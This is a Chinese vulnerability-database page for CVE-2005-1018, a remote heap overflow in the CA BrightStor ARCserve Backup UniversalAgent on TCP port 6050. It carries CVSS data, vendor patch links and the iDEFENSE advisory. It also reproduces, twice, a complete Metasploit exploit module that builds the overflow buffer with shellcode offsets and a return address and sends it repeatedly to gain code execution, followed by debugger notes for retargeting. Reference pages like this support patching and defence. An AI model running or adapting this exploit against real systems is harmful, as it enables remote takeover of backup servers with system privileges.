CVE-2005-1018
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:16:31
NMCOEPS    

[原文]Buffer overflow in the UniversalAgent for Computer Associates (CA) BrightStor ARCserve Backup allows remote authenticated users to cause a denial of service or execute arbitrary code via an agent request to TCP port 6050 with a large argument before the option field.


[CNNVD]CA BrightStor ARCserve Backup UniversalAgent缓冲区溢出漏洞(CNNVD-200505-427)

        BrightStor ARCserve Backup可为所有级别的Windows、NetWare、Linux和UNIX服务器及Windows、Mac OS X、Linux、UNIX、AS/400和VMS客户环境提供备份,恢复防护。BrightStor软件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1018
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1018
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-427
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111351851802682&w=2
(UNKNOWN)  BUGTRAQ  20050414 Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup UniversalAgent buffer overflow vulnerability
http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050411 Computer Associates BrightStor ARCserve Backup UniversalAgent Buffer Overflow
http://www.securityfocus.com/archive/1/390760
(UNKNOWN)  BUGTRAQ  20050217 RE: BrightStor ARCserve Backup buffer overflow PoC (fixes available)
http://www.securityfocus.com/bid/13102
(UNKNOWN)  BID  13102

- 漏洞信息

CA BrightStor ARCserve Backup UniversalAgent缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2009-07-21 00:00:00
远程  
        BrightStor ARCserve Backup可为所有级别的Windows、NetWare、Linux和UNIX服务器及Windows、Mac OS X、Linux、UNIX、AS/400和VMS客户环境提供备份,恢复防护。BrightStor软件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
        Computer Associates APAR #: QO66526
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 6&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
        Computer Associates APAR #: QO66529
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 9&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
        Computer Associates APAR #: QO66531
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 1&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
        Computer Associates APAR #: QO66530
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 0&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
        Computer Associates APAR #: QO66527
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 7&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
        Computer Associates APAR #: QO66528
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 8&startsearch=1
        Computer Associates BrightStor Enterprise Backup 10.0
        Computer Associates APAR #: QO66523
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 3&startsearch=1
        Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
        Computer Associates APAR #: QO66533
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 3&startsearch=1
        Computer Associates BrightStor Enterprise Backup 10.5
        Computer Associates APAR #: QO66524
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 4&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
        Computer Associates APAR #: QO66535
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 5&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 11.0
        Computer Associates APAR #: QO66525
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6652 5&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
        Computer Associates APAR #: QO66534
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 4&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
        Computer Associates APAR #: QO66536
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO6653 6&startsearch=1

- 漏洞信息 (16405)

CA BrightStor Universal Agent Overflow (EDBID:16405)
windows remote
2010-06-22 Verified
0 metasploit
N/A [点击下载]
##
# $Id: universal_agent.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Universal Agent Overflow',
			'Description'    => %q{
					This module exploits a convoluted heap overflow in the CA
				BrightStor Universal Agent service. Triple userland
				exception results in heap growth and execution of
				dereferenced function pointer at a specified address.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2005-1018'],
					[ 'OSVDB', '15471' ],
					[ 'BID', '13102'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
					'Space'    => 164,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Magic Heap Target #1',
						{
							'Platform' => 'win',
							'Ret'      => 0x01625c44, # We grow to our own return address
						},
					],
				],
			'DisclosureDate' => 'Apr 11 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6050)
			], self.class)
	end

	def exploit

		print_status("Trying target #{target.name}...")

		# The server reverses four bytes starting at offset 0xa5 :0

		# Create the overflow string
		boom = 'X' * 1024

		# Required field to trigger the fault
		boom[248, 2] = [1000].pack('V')

		# The shellcode, limited to 250 bytes (no nulls)
		boom[256, payload.encoded.length] = payload.encoded

		# This should point to itself
		boom[576, 4] = [target.ret].pack('V')

		# This points to the code below
		boom[580, 4] = [target.ret + 8].pack('V')

		# We have 95 bytes, use it to hop back to shellcode
		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

		# Stick the protocol header in front of our request
		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

		# We keep making new connections and triggering the fault until
		# the heap is grown to encompass our known return address. Once
		# this address has been allocated and filled, each subsequent
		# request will result in our shellcode being executed.

		1.upto(200) {|i|
			connect
			print_status("Sending request #{i} of 200...") if (i % 10) == 0
			sock.put(req)
			disconnect

			# Give the process time to recover from each exception
			select(nil,nil,nil,0.1);
		}

		handler
	end

end


__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
[ snip ]
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
		

- 漏洞信息 (F83156)

CA BrightStor Universal Agent Overflow (PacketStormID:F83156)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2005-1018
[点击下载]

This Metasploit module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor Universal Agent Overflow',
			'Description'    => %q{
				This module exploits a convoluted heap overflow in the CA
				BrightStor Universal Agent service. Triple userland
				exception results in heap growth and execution of
				dereferenced function pointer at a specified address.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1018'],
					[ 'OSVDB', '15471' ],
					[ 'BID', '13102'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
					'Space'    => 164,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Magic Heap Target #1',
						{
							'Platform' => 'win',
							'Ret'      => 0x01625c44, # We grow to our own return address
						},
					],
				],
			'DisclosureDate' => '',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6050)
				], self.class)	
	end

	def exploit

		print_status("Trying target #{target.name}...")
			
		# The server reverses four bytes starting at offset 0xa5 :0

		# Create the overflow string
		boom = 'X' * 1024

		# Required field to trigger the fault
		boom[248, 2] = [1000].pack('V')
		
		# The shellcode, limited to 250 bytes (no nulls)
		boom[256, payload.encoded.length] = payload.encoded

		# This should point to itself
		boom[576, 4] = [target.ret].pack('V')
		
		# This points to the code below
		boom[580, 4] = [target.ret + 8].pack('V')

		# We have 95 bytes, use it to hop back to shellcode
		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

		# Stick the protocol header in front of our request
		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

		# We keep making new connections and triggering the fault until
		# the heap is grown to encompass our known return address. Once
		# this address has been allocated and filled, each subsequent
		# request will result in our shellcode being executed.

		1.upto(200) {|i|	
			connect
			print_status("Sending request #{i} of 200...") if (i % 10) == 0
			sock.put(req)
			disconnect

			# Give the process time to recover from each exception
			sleep(0.1);
		}
	
		handler
	end

end
	

__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
[ snip ]
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
    

- 漏洞信息 (F37148)

iDEFENSE Security Advisory 2005-04-11.t (PacketStormID:F37148)
2005-04-18 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-1018
[点击下载]

iDEFENSE Security Advisory 04.11.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates International Inc's BrightStor ARCserve Backup UniversalAgent may allow attackers to execute arbitrary code.

Computer Associates BrightStor ARCserve Backup UniversalAgent Buffer 
Overflow

iDEFENSE Security Advisory 04.11.05
www.idefense.com/application/poi/display?id=232&type=vulnerabilities
April 11, 2005

I. BACKGROUND

BrightStor ARCserve Backup provides backup and restore protection for 
all classes of Windows, NetWare, Linux and UNIX servers, as well as 
Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates International Inc's BrightStor ARCserve Backup UniversalAgent

may allow attackers to execute arbitrary code.

The BrightStor software uses a network agent to perform backups on nodes

across the network. This agent service requires either administrative 
credentials or a node-specific password and is capable of backing up 
system settings as well as files. This agent will listen on TCP and UDP 
ports 6050 by default.

When an agent request is received on the TCP port, with the "option" 
field set to 0, 3 or 1000, and a large string preceding this "option"
field in the packet, an overflow will occur. The agent software
includes its own exception handler, preventing the service from
actually crashing. Each time an exception occurs due to this overflow,
the handler will kick in and restore the service back to an operating
state. This particular overflow will cause three exceptions, two of
which are non-exploitable, and one which can be used to hijack
execution.

III. ANALYSIS

Successful exploitation of this vulnerability allows for a remote 
unauthenticated compromise with system level access. Although 
exploitation of this vulnerability is not trivial, it has been shown 
that it can be done reliably.

IV. DETECTION

Computer Associates BrightStor ARCserve Backup v11 (Win32) has been 
confirmed vulnerable.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction 
mechanism to limit access to systems and services.

VI. VENDOR RESPONSE

Vendor advisories and patches for this vulnerability are available at:

BrightStor ARCserve Backup r11.1 for Windows (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66526&
startsearch=1

BrightStor ARCserve Backup r11.1 Client Agent for Windows only:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66527&
startsearch=1

BrightStor ARCserve Backup r11.1 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66534&
startsearch=1

BrightStor ARCserve Backup r11.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66525&
startsearch=1

BrightStor ARCserve Backup r11.0 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66535&
startsearch=1

BrightStor ARCserve Backup v9.01 for Windows English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66528&
startsearch=1

BrightStor ARCserve Backup v9.01 for Windows Non-English (all
components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66529&
startsearch=1

BrightStor ARCserve Backup v9.01 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66536&
startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only
(English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66530&
startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only
(Non-English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66531&
startsearch=1

BrightStor Enterprise Backup v10.5 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66524&
startsearch=1

BrightStor Enterprise Backup v10.5 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66533&
startsearch=1

BrightStor Enterprise Backup v10.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66523&
startsearch=1 

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1018 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/02/2004 Initial vendor notification
12/02/2004 Initial vendor response
04/11/2005 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

15471
CA BrightStor ARCserve Backup Universal Agent Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Commercial

- 漏洞描述

A remote overflow exists in ARCServe Backup. The Universal Agent fails to validate packets which are received on the TCP port, with the "option" field set to 0, 3 or 1000, and a large string preceding this "option" field in the packet, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-04-11 2004-12-02
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Computer Associates BrightStor ARCserve Backup UniversalAgent Remote Buffer Overflow Vulnerability
Boundary Condition Error 13102
Yes No
2005-04-11 12:00:00 2009-07-13 04:26:00
Discovery is credited to an anonymous source.

- 受影响的程序版本

Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates BrightStor Enterprise Backup 10.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.0
Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1

- 漏洞讨论

A remote buffer-overflow vulnerability affects BrightStor ARCserve and ARCserve Enterprise agent because the application fails to securely copy data from the network.

A remote attacker may exploit this issue to execute arbitrary code on a vulnerable computer, potentially facilitating unauthorized superuser access. A denial-of-service condition may arise as well.

BrightStor ARCserve Backup v11 for Win32 platforms is vulnerable; other versions may also be affected.

- 漏洞利用

Exploit code is available as part of the Metasploit Framework:

- 解决方案

The vendor has released advisories and fixes. Please see the references for details.


Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1

Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01

Computer Associates BrightStor Enterprise Backup 10.0

Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5

Computer Associates BrightStor Enterprise Backup 10.5

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0

Computer Associates BrightStor ARCServe Backup for Windows 11.0

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站